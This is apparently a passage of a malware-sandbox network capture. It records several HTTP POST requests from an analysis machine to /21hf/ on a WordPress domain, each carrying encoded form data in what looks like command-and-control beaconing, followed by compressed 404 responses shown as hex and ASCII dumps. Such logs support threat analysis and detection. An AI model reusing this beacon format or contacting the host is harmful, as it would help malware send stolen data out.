                                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Encoding: br
                                                                                                                                                                                                                                                              Content-Length: 12492
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 53 46 01 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 59 86 10 90 64 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 04 b3 25 c9 3a a7 24 79 f6 c8 d0 7b 24 43 37 bf 77 1f fc 5f 28 36 e3 82 ed 21 c0 2c 58 c4 24 d9 24 ae e1 f2 f4 c2 00 85 13 6f 44 41 94 ec 63 98 d6 6e 7f 9f 75 d7 25 88 88 8a 80 9a b4 f7 12 97 c7 e6 35 c1 52 8d f2 62 32 54 33 19 db ee 0f 07 4e 62 18 54 22 e1 ef ab 8c 59 7b a1 96 52 86 e3 28 89 ff cb 98 5a 36 dd 73 bf c8 49 78 6a 80 48 ac 8b 12 30 b8 9a 73 0d 98 74 f5 0a e9 8e fe 78 9c e3 60 ee 69 51 88 f7 91 0a e5 bc 5c 4b 3c 97 85 a5 80 c8 a1 dd 50 d4 55 51 0f 11 48 30 65 70 a5 12 b8 f4 b7 78 51 00 46 dc e2 63 7a 71 50 97 dd 60 0c d2 21 a1 71 91 d4 78 11 98 92 0c 1c dc 0e 5d ef 81 63 11 14 df 3f 9e 10 25 dc 3d de d1 2f 77 9f 7f 7c df e7 d9 33 9b 7f 68 4d f7 0a 56 b7 d5 a2 e9 1c d2 eb d8 6a 5f ef 17 bb 6d 78 d6 61 a8 9c a2 07 d5 1e 5f 8f 47 af ac 9a [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: SFAI?TM||}grz+ "Cw^\LoK"9dYd^=%:$y{$C7w_(6!,X$$oDAcnu%5Rb2T3NbT"Y{R(Z6sIxjH0stx`iQ\K<PUQH0epxQFczqP`!qx]c?%=/w|3hMVj_mxa_GAO(7yHf^~d9[P3Y.jV">/Q{oFTFe+)+q=d)DG wu;~ whk}}W+To6zO[SZS\=UR&4jG8h9H)nN<Gto}5V{}B_.xQx*viD&LPioXUqHX;dWLtN8VI9V"m<((}?L#ygz4i/4}fQab]OTP0lUUUyL~#;r5+C^]tl~:6mtj}:JLU5:/WB}pU/H:|v&iw_7iAinZn:iSm.A:]L23m~
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.133547068 CEST1289INData Raw: 10 9e b0 14 44 ce bf ef 16 2a c6 a8 ad d0 ac 3f d0 b5 6a 0d ba aa c4 fc 5d fb 2d fc ab b7 af da ea 22 b3 1f eb 7e d0 37 37 aa 43 0a cf 71 71 f9 ae 06 8b 7e 29 d3 63 5f b7 db e6 3f be 2f ac 51 a0 72 5d 97 48 38 2e 8c a2 90 a0 d2 3c 0b 61 a2 2a 5b
                                                                                                                                                                                                                                                              Data Ascii: D*?j]-"~77Cqq~)c_?/Qr]H8.<a*[^x"nVo-u}+I_0t|? W^sp;kT8z"t8y|U||!K+M<kVS9F`_QqZ
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.133563042 CEST1289INData Raw: e7 81 3a f0 d7 ba 84 0a 55 b8 fb 14 3a 6f 95 f3 54 12 e8 1a 89 ee d7 a6 18 11 6e 6b 2b a2 bd 29 59 01 f7 5e f4 60 f1 45 08 b6 8c 58 9a c7 a7 9c f1 68 d9 26 2c 8d 22 7a f8 2c 20 98 14 29 2e cc 52 38 bd a8 fb 9c f1 f8 24 58 16 65 7f 88 88 c9 36 61
                                                                                                                                                                                                                                                              Data Ascii: :U:oTnk+)Y^`EXh&,"z, ).R8$Xe6aQpf,J;h2nE5N,qgc%[Tf\+1"ELD?w^ ii)?7N@%vq2x;!;7r184dC2
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.499608994 CEST1289INData Raw: 52 08 e6 fe b0 10 15 c2 7d e2 90 6e 69 6a 6a da 69 4b 65 83 63 78 19 ec cd 10 e1 06 26 b9 57 6b 18 1e e8 7c 72 41 62 5e f0 e6 72 72 c1 61 5e 34 3a e0 14 02 4b d5 79 3b 1e df 38 8b c5 01 e9 e8 1c 49 75 a7 08 93 75 93 db bf ef b6 b2 df ce 7c 80 c9
                                                                                                                                                                                                                                                              Data Ascii: R}nijjiKecx&Wk|rAb^rra^4:Ky;8Iuu|3Qs+R8e<cY9)woCa4s52QH;DUp-ErH~Lp4"439r<vXAPsTc|638PWmvcf-)IQ8=g<a#P
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.499694109 CEST1289INData Raw: 91 2a fc 09 d5 b7 b1 de 08 af a7 0c d6 3c ba 0b b8 ce 36 4d bd 49 5c 60 92 50 e8 c5 75 c3 a8 f0 d1 a3 bb 80 eb 5c 37 62 5b f3 37 28 28 40 e4 0c 14 3e 7a b4 14 70 bd dc 24 42 bb 13 ac 5c c0 a6 88 96 43 47 34 38 98 dd 77 b3 cc ba 3c 59 c0 b5 18 78
                                                                                                                                                                                                                                                              Data Ascii: *<6MI\`Pu\7b[7((@>zp$B\CG48w<Yx",>.Tk(^K\{"a]kuiM4|XYntPvQAJD)3"0w+>s "q&\Q(WJND'DDvb.'d"a}x8uHE
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.499835014 CEST1289INData Raw: f8 1c 20 1c 58 2e 69 bd a1 cc ab 13 83 f4 2a dc 26 13 25 ab b0 41 88 85 04 d4 a0 7c 3f d2 ca 73 ad 73 4c 61 bf 8d 43 81 bb c0 fb 80 c0 78 df 0e 27 8d 05 6b 3d 48 fe 0e da a9 21 02 dc 18 5a 96 52 66 70 dc c2 78 f1 c4 d1 98 6e 3a 5e fc 40 56 7a 3b
                                                                                                                                                                                                                                                              Data Ascii: X.i*&%A|?ssLaCx'k=H!ZRfpxn:^@Vz;fB8Tc<cQn"<fw3B~[/bvLcn_Coz`<[J{:wm*Y3pEz[EtofRcy4RkE+&?%Ill@H
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.499900103 CEST1289INData Raw: 6b 5e 67 c7 33 78 e8 e9 63 f4 fd 29 8e bf bb dd 9a dd 84 2c 6f 12 f6 3b 97 4f 21 c3 5a 9a 58 77 ef 7c e2 e1 a5 b9 c6 98 7f 64 96 5b 27 3e 01 1a 76 8e c0 0c 33 3a 74 fa 2e d9 1e f4 bf 76 eb 79 9d 7b 04 6e 9d bb f5 ee e2 4e 71 11 f0 93 0d 09 0a e1
                                                                                                                                                                                                                                                              Data Ascii: k^g3xc),o;O!ZXw|d['>v3:t.vy{nNqVK`nJM[+u76cd>lsLr)tPF$aPOXb_hp`XmKMyhVe%,m[a1}`3;E{?])#
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.871454954 CEST1289INData Raw: f7 80 3b 7b 99 79 9f 47 bc 96 5e 66 67 95 d7 0a 6c 2a 16 33 b2 9f 9a f5 a4 ad c6 d4 60 28 f0 b6 1d 52 f9 9d 7b 1e e8 8b eb 3b 12 bf ba c0 07 c7 af 8d f1 3f be 3d f0 09 de b8 39 e6 6f 8f 9f 22 9b 73 39 b4 76 a8 59 3f 1f d6 ba 86 df 71 82 da 85 7a
                                                                                                                                                                                                                                                              Data Ascii: ;{yG^fgl*3`(R{;?=9o"s9vY?qzO~y_mo 1g0Zzom6=g-yps3``]-E`O1'5lQ(;E/eatgC;)jod!a +a7is
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.872560024 CEST1289INData Raw: 10 22 08 e0 e8 f3 f4 d4 50 81 be e8 ee 88 a6 c5 4a 70 15 44 66 74 af 9c 2c 24 83 15 92 d2 84 c1 11 a0 cb e0 60 97 4f 51 1a 7a 8b d6 eb aa 38 15 d6 51 6f 1f 03 69 78 36 c3 7f b4 ef 68 79 5f a1 14 d7 ac 42 21 06 d5 98 60 01 60 1c fd da dd 07 02 6b
                                                                                                                                                                                                                                                              Data Ascii: "PJpDft,$`OQz8Qoix6hy_B!``kWFw}[/s9#jvH>vYV)}'f)NK>iB1e,q(D6WPc^2y}Q-NF4U$DLVZI3C
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.872683048 CEST1288INData Raw: b3 30 9b de 7c 45 b7 ff b1 1e fb da a8 76 ba 0f 23 6f df b0 31 c5 45 06 5f 7a 26 bd 5e 62 53 20 05 fd 7d 5d a0 a4 fc f0 87 ce bd 7d b0 b3 07 32 b5 ef 67 e3 fb 70 cd e7 bf 0b fe d6 66 34 37 75 b7 63 f3 c6 fb 2a df 1a f4 30 4b c9 a5 7f e4 54 df 53
                                                                                                                                                                                                                                                              Data Ascii: 0|Ev#o1E_z&^bS }]}2gpf47uc*0KTS5*uC4j!4@#ZAx! $&3Tu=]Ubh$H]:}jJ,J#rcu#J@&:#O]]5#uN~\


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              47192.168.11.2049796103.247.8.5380
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.042990923 CEST852OUTPOST /21hf/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.asa-malukuutara.com/21hf/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 6b 33 6c 72 53 2f 54 35 54 32 79 36 31 32 4c 4c 57 68 72 6b 30 31 53 49 4e 78 35 68 57 71 2f 4a 54 61 34 6e 76 4f 65 30 6c 71 4c 50 31 46 67 58 41 7a 32 52 76 75 78 35 4a 46 6e 66 67 68 58 4d 68 45 7a 74 54 4d 4b 58 46 62 66 4c 36 52 2f 45 42 2f 4e 31 31 41 56 2f 34 45 4b 61 6a 33 41 77 76 4a 5a 61 34 39 2f 51 6e 50 37 49 30 69 75 32 55 4f 7a 62 32 4c 75 69 2f 56 66 54 51 68 48 6f 7a 61 50 4a 42 2b 71 38 56 73 49 64 6f 79 39 2b 6a 36 49 69 47 44 59 70 64 53 59 5a 6c 35 4b 58 6c 74 68 4e 53 62 62 74 31 51 74 53 7a 73 55 62 57 4c 32 73 71 31 66 38 4b 43 58 32 50 37 55 72 54 45 4c 65 54 7a 44 56 72 61 39 62 76 36 4e 62 35 43 75 44 41 43 41 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=k3lrS/T5T2y612LLWhrk01SINx5hWq/JTa4nvOe0lqLP1FgXAz2Rvux5JFnfghXMhEztTMKXFbfL6R/EB/N11AV/4EKaj3AwvJZa49/QnP7I0iu2UOzb2Lui/VfTQhHozaPJB+q8VsIdoy9+j6IiGDYpdSYZl5KXlthNSbbt1QtSzsUbWL2sq1f8KCX2P7UrTELeTzDVra9bv6Nb5CuDACA=
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583117962 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:40:51 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                              Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Encoding: br
                                                                                                                                                                                                                                                              Content-Length: 12492
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 53 46 01 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 59 86 10 90 64 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 04 b3 25 c9 3a a7 24 79 f6 c8 d0 7b 24 43 37 bf 77 1f fc 5f 28 36 e3 82 ed 21 c0 2c 58 c4 24 d9 24 ae e1 f2 f4 c2 00 85 13 6f 44 41 94 ec 63 98 d6 6e 7f 9f 75 d7 25 88 88 8a 80 9a b4 f7 12 97 c7 e6 35 c1 52 8d f2 62 32 54 33 19 db ee 0f 07 4e 62 18 54 22 e1 ef ab 8c 59 7b a1 96 52 86 e3 28 89 ff cb 98 5a 36 dd 73 bf c8 49 78 6a 80 48 ac 8b 12 30 b8 9a 73 0d 98 74 f5 0a e9 8e fe 78 9c e3 60 ee 69 51 88 f7 91 0a e5 bc 5c 4b 3c 97 85 a5 80 c8 a1 dd 50 d4 55 51 0f 11 48 30 65 70 a5 12 b8 f4 b7 78 51 00 46 dc e2 63 7a 71 50 97 dd 60 0c d2 21 a1 71 91 d4 78 11 98 92 0c 1c dc 0e 5d ef 81 63 11 14 df 3f 9e 10 25 dc 3d de d1 2f 77 9f 7f 7c df e7 d9 33 9b 7f 68 4d f7 0a 56 b7 d5 a2 e9 1c d2 eb d8 6a 5f ef 17 bb 6d 78 d6 61 a8 9c a2 07 d5 1e 5f 8f 47 af ac 9a [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: SFAI?TM||}grz+ "Cw^\LoK"9dYd^=%:$y{$C7w_(6!,X$$oDAcnu%5Rb2T3NbT"Y{R(Z6sIxjH0stx`iQ\K<PUQH0epxQFczqP`!qx]c?%=/w|3hMVj_mxa_GAO(7yHf^~d9[P3Y.jV">/Q{oFTFe+)+q=d)DG wu;~ whk}}W+To6zO[SZS\=UR&4jG8h9H)nN<Gto}5V{}B_.xQx*viD&LPioXUqHX;dWLtN8VI9V"m<((}?L#ygz4i/4}fQab]OTP0lUUUyL~#;r5+C^]tl~:6mtj}:JLU5:/WB}pU/H:|v&iw_7iAinZn:iSm.A:]L23m~
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583220005 CEST1289INData Raw: 10 9e b0 14 44 ce bf ef 16 2a c6 a8 ad d0 ac 3f d0 b5 6a 0d ba aa c4 fc 5d fb 2d fc ab b7 af da ea 22 b3 1f eb 7e d0 37 37 aa 43 0a cf 71 71 f9 ae 06 8b 7e 29 d3 63 5f b7 db e6 3f be 2f ac 51 a0 72 5d 97 48 38 2e 8c a2 90 a0 d2 3c 0b 61 a2 2a 5b
                                                                                                                                                                                                                                                              Data Ascii: D*?j]-"~77Cqq~)c_?/Qr]H8.<a*[^x"nVo-u}+I_0t|? W^sp;kT8z"t8y|U||!K+M<kVS9F`_QqZ
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583344936 CEST1289INData Raw: e7 81 3a f0 d7 ba 84 0a 55 b8 fb 14 3a 6f 95 f3 54 12 e8 1a 89 ee d7 a6 18 11 6e 6b 2b a2 bd 29 59 01 f7 5e f4 60 f1 45 08 b6 8c 58 9a c7 a7 9c f1 68 d9 26 2c 8d 22 7a f8 2c 20 98 14 29 2e cc 52 38 bd a8 fb 9c f1 f8 24 58 16 65 7f 88 88 c9 36 61
                                                                                                                                                                                                                                                              Data Ascii: :U:oTnk+)Y^`EXh&,"z, ).R8$Xe6aQpf,J;h2nE5N,qgc%[Tf\+1"ELD?w^ ii)?7N@%vq2x;!;7r184dC2
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583501101 CEST1289INData Raw: 52 08 e6 fe b0 10 15 c2 7d e2 90 6e 69 6a 6a da 69 4b 65 83 63 78 19 ec cd 10 e1 06 26 b9 57 6b 18 1e e8 7c 72 41 62 5e f0 e6 72 72 c1 61 5e 34 3a e0 14 02 4b d5 79 3b 1e df 38 8b c5 01 e9 e8 1c 49 75 a7 08 93 75 93 db bf ef b6 b2 df ce 7c 80 c9
                                                                                                                                                                                                                                                              Data Ascii: R}nijjiKecx&Wk|rAb^rra^4:Ky;8Iuu|3Qs+R8e<cY9)woCa4s52QH;DUp-ErH~Lp4"439r<vXAPsTc|638PWmvcf-)IQ8=g<a#P
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583517075 CEST1289INData Raw: 91 2a fc 09 d5 b7 b1 de 08 af a7 0c d6 3c ba 0b b8 ce 36 4d bd 49 5c 60 92 50 e8 c5 75 c3 a8 f0 d1 a3 bb 80 eb 5c 37 62 5b f3 37 28 28 40 e4 0c 14 3e 7a b4 14 70 bd dc 24 42 bb 13 ac 5c c0 a6 88 96 43 47 34 38 98 dd 77 b3 cc ba 3c 59 c0 b5 18 78
                                                                                                                                                                                                                                                              Data Ascii: *<6MI\`Pu\7b[7((@>zp$B\CG48w<Yx",>.Tk(^K\{"a]kuiM4|XYntPvQAJD)3"0w+>s "q&\Q(WJND'DDvb.'d"a}x8uHE
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583730936 CEST1289INData Raw: f8 1c 20 1c 58 2e 69 bd a1 cc ab 13 83 f4 2a dc 26 13 25 ab b0 41 88 85 04 d4 a0 7c 3f d2 ca 73 ad 73 4c 61 bf 8d 43 81 bb c0 fb 80 c0 78 df 0e 27 8d 05 6b 3d 48 fe 0e da a9 21 02 dc 18 5a 96 52 66 70 dc c2 78 f1 c4 d1 98 6e 3a 5e fc 40 56 7a 3b
                                                                                                                                                                                                                                                              Data Ascii: X.i*&%A|?ssLaCx'k=H!ZRfpxn:^@Vz;fB8Tc<cQn"<fw3B~[/bvLcn_Coz`<[J{:wm*Y3pEz[EtofRcy4RkE+&?%Ill@H
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583776951 CEST1289INData Raw: 6b 5e 67 c7 33 78 e8 e9 63 f4 fd 29 8e bf bb dd 9a dd 84 2c 6f 12 f6 3b 97 4f 21 c3 5a 9a 58 77 ef 7c e2 e1 a5 b9 c6 98 7f 64 96 5b 27 3e 01 1a 76 8e c0 0c 33 3a 74 fa 2e d9 1e f4 bf 76 eb 79 9d 7b 04 6e 9d bb f5 ee e2 4e 71 11 f0 93 0d 09 0a e1
                                                                                                                                                                                                                                                              Data Ascii: k^g3xc),o;O!ZXw|d['>v3:t.vy{nNqVK`nJM[+u76cd>lsLr)tPF$aPOXb_hp`XmKMyhVe%,m[a1}`3;E{?])#
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583925962 CEST1289INData Raw: f7 80 3b 7b 99 79 9f 47 bc 96 5e 66 67 95 d7 0a 6c 2a 16 33 b2 9f 9a f5 a4 ad c6 d4 60 28 f0 b6 1d 52 f9 9d 7b 1e e8 8b eb 3b 12 bf ba c0 07 c7 af 8d f1 3f be 3d f0 09 de b8 39 e6 6f 8f 9f 22 9b 73 39 b4 76 a8 59 3f 1f d6 ba 86 df 71 82 da 85 7a
                                                                                                                                                                                                                                                              Data Ascii: ;{yG^fgl*3`(R{;?=9o"s9vY?qzO~y_mo 1g0Zzom6=g-yps3``]-E`O1'5lQ(;E/eatgC;)jod!a +a7is
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.584050894 CEST1289INData Raw: 10 22 08 e0 e8 f3 f4 d4 50 81 be e8 ee 88 a6 c5 4a 70 15 44 66 74 af 9c 2c 24 83 15 92 d2 84 c1 11 a0 cb e0 60 97 4f 51 1a 7a 8b d6 eb aa 38 15 d6 51 6f 1f 03 69 78 36 c3 7f b4 ef 68 79 5f a1 14 d7 ac 42 21 06 d5 98 60 01 60 1c fd da dd 07 02 6b
                                                                                                                                                                                                                                                              Data Ascii: "PJpDft,$`OQz8Qoix6hy_B!``kWFw}[/s9#jvH>vYV)}'f)NK>iB1e,q(D6WPc^2y}Q-NF4U$DLVZI3C
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.584235907 CEST1288INData Raw: b3 30 9b de 7c 45 b7 ff b1 1e fb da a8 76 ba 0f 23 6f df b0 31 c5 45 06 5f 7a 26 bd 5e 62 53 20 05 fd 7d 5d a0 a4 fc f0 87 ce bd 7d b0 b3 07 32 b5 ef 67 e3 fb 70 cd e7 bf 0b fe d6 66 34 37 75 b7 63 f3 c6 fb 2a df 1a f4 30 4b c9 a5 7f e4 54 df 53
                                                                                                                                                                                                                                                              Data Ascii: 0|Ev#o1E_z&^bS }]}2gpf47uc*0KTS5*uC4j!4@#ZAx! $&3Tu=]Ubh$H]:}jJ,J#rcu#J@&:#O]]5#uN~\


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              48192.168.11.2049797103.247.8.5380
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:53.936989069 CEST1289OUTPOST /21hf/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.asa-malukuutara.com/21hf/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 6b 33 6c 72 53 2f 54 35 54 32 79 36 31 32 4c 4c 57 68 72 6b 30 31 53 49 4e 78 35 68 57 71 2f 4a 54 61 34 6e 76 4f 65 30 6c 71 44 50 31 7a 73 58 41 53 32 52 75 75 78 35 42 6c 6e 43 67 68 57 4f 68 45 62 70 54 4d 57 74 46 5a 58 4c 35 79 6e 45 4b 75 4e 31 38 41 56 2f 36 45 4b 58 74 58 41 6c 76 4a 4a 46 34 39 76 51 6e 50 37 49 30 6a 65 32 64 36 6e 62 77 4c 75 6a 34 56 66 58 55 68 47 42 7a 61 57 2b 42 2b 6d 7a 56 64 6f 64 6f 57 64 2b 6d 50 63 69 4e 44 59 72 51 79 59 33 6c 35 47 2b 6c 73 4e 72 53 61 75 49 31 52 31 53 79 5a 31 43 42 2b 57 52 37 6d 50 6a 47 7a 6a 30 4a 36 49 62 4e 6b 48 57 57 56 4c 75 70 63 6c 72 73 4d 78 6d 69 42 36 7a 63 6e 59 4f 46 4c 62 31 48 77 4c 38 6d 74 4b 4b 43 51 73 73 74 45 4b 79 76 33 54 70 4a 45 4f 56 4a 47 47 5a 43 73 67 63 48 51 70 33 75 74 34 6e 70 64 39 31 4c 77 79 7a 7a 67 2f 66 75 65 61 5a 57 70 4b 4c 43 36 6a 69 67 45 56 4b 32 33 6e 31 52 62 56 76 43 71 4e 77 2f 4a 7a 36 6b 39 71 76 51 36 74 58 54 55 49 44 51 2f 41 2f 79 58 30 77 4a 4e 68 4c 4a 50 33 59 79 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=k3lrS/T5T2y612LLWhrk01SINx5hWq/JTa4nvOe0lqDP1zsXAS2Ruux5BlnCghWOhEbpTMWtFZXL5ynEKuN18AV/6EKXtXAlvJJF49vQnP7I0je2d6nbwLuj4VfXUhGBzaW+B+mzVdodoWd+mPciNDYrQyY3l5G+lsNrSauI1R1SyZ1CB+WR7mPjGzj0J6IbNkHWWVLupclrsMxmiB6zcnYOFLb1HwL8mtKKCQsstEKyv3TpJEOVJGGZCsgcHQp3ut4npd91Lwyzzg/fueaZWpKLC6jigEVK23n1RbVvCqNw/Jz6k9qvQ6tXTUIDQ/A/yX0wJNhLJP3YykCYEICS+ikqLt5wwS9QZU/G5kIyQoOJVFv6kbByMJtX/dqHzEQwXG/wUnPKpw3WibyKD4UqKla65Kb5dGWgUzIpr83BiXMMctTnH5KgMOf7Y8CJ+nv2ckzjOjiEJIgjCkc8UA+0LKmkVtWo4PEQ3BtrLOY0A1av0M11CcQNljFGpQzCDuswTZdGm01lTgp/nGYia65/0WUiS+nzk9JhRxGdlX2EnYZIFreeRml4YLW++m5Nvz31wx4bCiWZMXIzBSUgSPjik4EygNrnVcCY+z4CfPocYYOVQIREO71iSqh1n0+Cwc8L4d7OQq3JbTSw
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:53.937038898 CEST1289OUTData Raw: 39 6d 30 41 4e 74 44 59 4b 39 58 53 42 46 34 44 73 72 2f 79 50 76 72 4f 32 31 75 33 6d 34 7a 75 42 31 67 44 54 43 48 53 58 6f 6d 39 32 6f 36 54 58 69 42 31 2b 47 6f 2f 38 43 30 48 43 4b 2b 6c 68 69 74 72 6d 64 69 50 65 42 75 50 55 50 49 72 59 79
                                                                                                                                                                                                                                                              Data Ascii: 9m0ANtDYK9XSBF4Dsr/yPvrO21u3m4zuB1gDTCHSXom92o6TXiB1+Go/8C0HCK+lhitrmdiPeBuPUPIrYyU7/IESgFU6oNENqaALk97mxq9qaBuOpn4bdWPKGjG73yBU67RVbuhoBeoGZ4d7FC/DrGQxTlJbVvF3FM84Af/ka3w4MKaOgUqrRliygMycsymtnOVwsKC5nC4F51V0eBoKOstjrszWDHxGiUdYFX7d+Sih6PV1Kef
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:53.937088013 CEST5423OUTData Raw: 66 41 49 6b 38 4e 46 38 4a 37 30 79 72 68 53 4f 74 78 77 6c 4a 57 58 49 67 6e 55 71 62 66 65 49 44 6e 58 45 70 6c 50 51 4d 34 43 43 36 4f 48 69 6f 75 6c 71 57 2f 4e 51 31 64 2b 35 42 48 33 61 66 53 56 6a 74 4d 41 61 79 4d 38 69 54 79 51 73 6e 6f
                                                                                                                                                                                                                                                              Data Ascii: fAIk8NF8J70yrhSOtxwlJWXIgnUqbfeIDnXEplPQM4CC6OHioulqW/NQ1d+5BH3afSVjtMAayM8iTyQsnok5gcp2fqTpADnF9FueRAE+8rRH0kCcmKHFZ/nDvGdJViYzAlFqAq5zpcJkLZXpigOUakPF23525D3ljOVfLuopRoW639wBLBViZgnTHAo6OTTnVFrGnu35R0huXoJfAxvlFl3xIFSZBgNzOGEmShDY+mwxsgde5Df
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.481220961 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:40:54 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                              Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Encoding: br
                                                                                                                                                                                                                                                              Content-Length: 12492
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
